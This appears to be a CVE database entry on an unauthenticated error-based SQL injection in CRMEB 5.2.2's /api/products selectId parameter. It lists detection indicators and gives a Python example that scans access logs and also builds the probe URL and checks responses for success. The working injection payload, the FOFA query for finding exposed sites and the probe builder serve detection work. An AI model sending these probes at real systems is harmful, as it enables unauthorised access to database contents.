cbcvebase.
CVE-2024-36837
published 2024-06-05

Priority: P2 (60) · Severity: high · CVSS 3.1 base score: 7.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploit: available
EPSS: 8.31% (94.2nd percentile)
SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.

Affected (1 range)

Vendor: crmeb · Product: crmeb · Version range: (none given) · Fixed in: (none given)

Detection & IOCs (extracted from sources)

url: /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)
path: /api/products
path: ProductController.php
  • The SQL injection payload is delivered via the `selectId` GET parameter on the `/api/products` endpoint. The technique is error-based: MySQL `GTID_SUBSET()` rejects a non-GTID first argument with a "Malformed GTID set specification" error that echoes that argument, so wrapping the injected subquery in `CONCAT(0x7e, ..., 0x7e)` makes its result surface in the database error message rather than in the query's own result set.
  • A successful exploitation response returns HTTP 200 with Content-Type `application/json` and contains both the MD5 hash of the injected integer and the string `SQLSTATE` in the response body.
  • FOFA fingerprinting query `title="CRMEB"` can be used to identify exposed CRMEB instances potentially vulnerable to this CVE.
  • The vulnerability is triggered through the `getProductList` function inside `ProductController.php`; monitor GET requests to `/api/products` with a `selectId` parameter containing SQL function calls such as `GTID_SUBSET`, `CONCAT`, `ELT`, or `md5`.
  • The Nuclei template uses a randomised integer (`rand_int(9000000, 9999999)`) as the injection payload seed and matches its MD5 hash in the response body, so detection signatures must account for a variable payload rather than a static string.
  • The exploit requires only a single unauthenticated GET request (`max-request: 1`), lowering the bar for mass scanning and exploitation.
  • The source this note was extracted from reported an EPSS score of 0.91665 (99.68th percentile); the header above shows 8.31% (94.2nd percentile). EPSS is recomputed daily, so the two snapshots differ, but both place this CVE well above most published vulnerabilities in exploitation probability; treat detections as high-priority.
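As an added example (not code from this page, the Nuclei template, or the CRMEB project), the detection logic described above run over a few constructed access-log lines, plus the template's success criteria re-implemented as a response matcher. `SAMPLE_LOG`, `sample_error_body` and the other names are assumptions; the log lines are made up, and the error body is constructed, modelled on the MySQL "Malformed GTID set specification" error that `GTID_SUBSET()` raises on non-GTID input, which is what makes the MD5 value appear in the error text. The scanner also handles the double-URL-encoded variant of the payload, which the page does not mention.

```python
from __future__ import annotations

import hashlib
import random
import re
from typing import Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format). Not real traffic.
# Line 1: the page's payload, seed 9123456.  Line 2: benign request.
# Line 3: lower-case, percent-encoded payload that produced a 500.
# Line 4: double-URL-encoded payload.  Line 5: unrelated endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2024:10:00:01 +0000] "GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9123456)))),0x7e),3550) HTTP/1.1" 200 412
203.0.113.9 - - [05/Jun/2024:10:00:02 +0000] "GET /api/products?limit=20&selectId=3 HTTP/1.1" 200 8834
203.0.113.7 - - [05/Jun/2024:10:00:03 +0000] "GET /api/products?selectId=gtid_subset%28concat%280x7e%2Cmd5%281%29%29%2C1%29 HTTP/1.1" 500 233
203.0.113.11 - - [05/Jun/2024:10:00:04 +0000] "GET /api/products?selectId=GTID_SUBSET%2528CONCAT%25280x7e%252Cmd5%25281%2529%2529%252C1%2529 HTTP/1.1" 200 410
203.0.113.8 - - [05/Jun/2024:10:00:05 +0000] "GET /api/index HTTP/1.1" 200 120
"""

# Function names from the page's bullet list. Matched case-insensitively as
# whole words followed by "(" because MySQL function names are not case-sensitive.
SQL_FUNC_TOKENS = ("GTID_SUBSET", "CONCAT", "ELT", "MD5")
_TOKEN_RE = re.compile(r"\b(" + "|".join(SQL_FUNC_TOKENS) + r")\s*\(", re.IGNORECASE)
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def suspicious_select_id(target: str) -> Optional[str]:
    """Return the decoded selectId value when the request targets /api/products
    and selectId contains one of the SQL function calls, otherwise None."""
    parts = urlsplit(target)
    if parts.path != "/api/products":
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("selectId", []):
        # parse_qs already decoded once; a second pass catches double-encoded payloads.
        decoded = unquote_plus(value)
        if _TOKEN_RE.search(decoded):
            return decoded
    return None


def scan_log(text: str) -> list[dict]:
    """Parse combined-format log lines and return one hit per flagged request."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        payload = suspicious_select_id(m["target"])
        if payload is not None:
            hits.append({"ip": m["ip"], "status": int(m["status"]), "payload": payload})
    return hits


def build_probe(seed: Optional[int] = None) -> tuple[str, str]:
    """Build the probe target the way the template does (random seed in
    9000000..9999999) and return it with the MD5 the response must echo."""
    num = seed if seed is not None else random.randint(9000000, 9999999)
    digest = hashlib.md5(str(num).encode()).hexdigest()
    target = ("/api/products?limit=20&priceOrder=&salesOrder=&selectId="
              f"GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({num})))),0x7e),3550)")
    return target, digest


def response_matches(status: int, content_type: str, body: str, digest: str) -> bool:
    """The page's success criteria: HTTP 200, application/json, and both the
    MD5 of the injected integer and the string SQLSTATE in the body."""
    return (status == 200
            and content_type.split(";")[0].strip().lower() == "application/json"
            and digest in body
            and "SQLSTATE" in body)


def sample_error_body(digest: str) -> str:
    """Constructed error response, modelled on a leaked PDO/MySQL error message."""
    return ('{"status":400,"msg":"SQLSTATE[HY000]: General error: '
            f"Malformed GTID set specification '~{digest}~'.\"}}")


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} status={hit['status']} selectId={hit['payload']}")
    probe, expected_md5 = build_probe()
    print("probe:", probe)
    print("match:", response_matches(200, "application/json", sample_error_body(expected_md5), expected_md5))
```

The log scanner flags on request shape alone, so it catches the probe whether or not it succeeded (the 500 in line 3 is still a hit); `response_matches` is the separate, stricter check for whether a given response actually leaked the database error.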